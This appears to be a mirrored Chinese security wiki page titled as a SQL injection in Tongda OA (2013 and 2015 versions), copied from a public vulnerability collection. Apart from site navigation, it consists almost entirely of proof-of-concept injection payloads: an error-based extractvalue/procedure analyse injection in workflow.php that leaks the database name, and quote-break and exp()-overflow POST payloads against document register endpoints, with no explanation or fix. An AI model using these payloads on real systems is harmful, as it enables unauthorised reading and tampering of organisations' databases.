menu arrow_back 湛蓝安全空间 |狂野湛蓝,暴躁每天 chevron_right All_wiki chevron_right yougar0.github.io(基于零组公开漏洞库 + PeiQi文库的一些漏洞)-20210715 chevron_right Web安全 chevron_right 通达oa chevron_right 通达oa sql注入.md
  • home 首页
  • brightness_4 暗黑模式
  • cloud
    xLIYhHS7e34ez7Ma
    cloud
    湛蓝安全
    code
    Github
    通达oa sql注入.md
    607 B / 2021-04-21 09:23:46
        通达oa sql注入
    ==============
    
    一、漏洞简介
    ------------
    
    二、漏洞影响
    ------------
    
    2013、2015版本
    
    三、复现过程
    ------------
    
    poc
    
        http://0-sec.org/general/mytable/intel_view/workflow.php?MAX_COUNT=15 procedure analyse(extrac
        tvalue(rand(),concat(0x3a,database())),1)&TYPE=3&MODULE_SCROLL=false&MODULE_ID=55&
        MODULE_ID=Math.random
        http://0-sec.org/general/document/index.php/recv/register/turn    
    
        post(_SERVER=&rid=1')
        http://0-sec.org/general/document/index.php/recv/register/insert  
    
        post:   
        title)values("'"^exp(if(1%3d2,1,710)))#=1&_SERVER
    
    
    links
    file_download